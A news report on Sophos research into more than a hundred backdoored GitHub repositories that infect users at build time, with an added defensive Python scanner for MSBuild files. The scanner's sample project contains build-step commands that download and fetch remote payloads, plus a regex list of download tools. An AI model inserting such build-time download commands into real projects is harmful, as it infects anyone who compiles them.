Sophos researchers have traced more than a hundred backdoored malware repositories on GitHub to a single Russian threat actor using the identifier “ischhfd83,” who has been systematically targeting novice cybercriminals and video game cheaters seeking malicious code. The investigation began when a Sophos customer inquired about Sakura RAT, a supposedly sophisticated remote access trojan that gained attention through tech journalism and social media posts in April, only to discover it was actually a backdoored version that infected would-be attackers with additional malware.
Analysis revealed that Sakura RAT was largely copied from AsyncRAT, a widely used cybercriminal tool, but with many forms left empty to prevent proper functionality while secretly installing infostealers and other malicious software on the user’s device. The backdoor was implemented through a PreBuild event in the Visual Basic project file that silently downloaded malware during compilation. This same technique was found across 111 of the 141 repositories linked to the ischhfd83 email address, with 133 repositories containing some form of backdoor functionality targeting unsuspecting users.
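A defender-side check for the build-event trick described above, added here as an illustrative example rather than anything from the Sophos report: it walks an MSBuild project file (.vbproj/.csproj) and flags PreBuildEvent, PostBuildEvent and Exec tasks whose command fetches remote content. The sample project and its URL are constructed placeholders, not indicators from the campaign.

```python
"""Scan MSBuild project files for build events that pull content from the
network, which is how the backdoored repositories infected anyone who compiled
them. Added example; the sample project and URL below are constructed."""
import re
import xml.etree.ElementTree as ET

# Download primitives commonly abused from a build step (defender heuristic).
NETWORK_FETCH = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Net\.WebClient|\bcurl\b|\bwget\b|bitsadmin|certutil[^\n]*-urlcache|"
    r"Start-BitsTransfer|https?://)",
    re.IGNORECASE,
)

def _local_name(tag):
    """MSBuild files usually carry the 2003 namespace; compare on the local name."""
    return tag.rsplit("}", 1)[-1]

def find_suspicious_build_events(project_xml):
    """Return (element name, command) for every build event or Exec task whose
    command looks like a network fetch. Legitimate events (copy, echo) pass."""
    root = ET.fromstring(project_xml)
    findings = []
    for elem in root.iter():
        name = _local_name(elem.tag)
        if name in ("PreBuildEvent", "PostBuildEvent"):
            command = (elem.text or "").strip()
        elif name == "Exec":                     # <Exec Command="..."/> inside a Target
            command = elem.get("Command", "").strip()
        else:
            continue
        if command and NETWORK_FETCH.search(command):
            findings.append((name, command))
    return findings

# Constructed sample: one benign post-build copy, two build steps that download.
SAMPLE_VBPROJ = """<Project ToolsVersion="15.0"
  xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <PreBuildEvent>powershell -c "iwr https://placeholder.invalid/s.exe -OutFile s.exe"</PreBuildEvent>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)dist\\"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="PreBuildEvent">
    <Exec Command="curl -s https://placeholder.invalid/x.ps1 -o x.ps1" />
  </Target>
</Project>"""

if __name__ == "__main__":
    for name, command in find_suspicious_build_events(SAMPLE_VBPROJ):
        print(f"[!] {name}: {command}")
```

Run it against every project file in a cloned repository before opening the solution; the same heuristic applies to Directory.Build.props and .targets files, which are also imported at build time.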
The malicious repositories were carefully crafted to appear legitimate, with 58 percent marketed as video game cheats and 24 percent disguised as malware projects, exploits, or attack tools. The threat actor used GitHub Actions workflows to automate thousands of commits, with some repositories registering nearly 60,000 commits in just a few months to create the illusion of active development. However, closer inspection revealed telltale signs of the deception, including repositories with few contributors who had no projects of their own, similar usernames with minor character variations, and contributors who only worked on projects within the same network.
Sophos linked this campaign to previous research by security firms including Checkmarx, Trend Micro, Kaspersky, and Check Point, characterizing it as part of a broader distribution-as-a-service operation that has been active since at least 2022. While the exact distribution methods remain unclear, previous investigations have identified Discord and YouTube as primary channels for spreading links to these malicious GitHub projects. The campaign represents a rare example of cybercriminals targeting their own community, though researchers warn that inexperienced open source enthusiasts could easily be deceived by the automated commits and professional appearance of these repositories.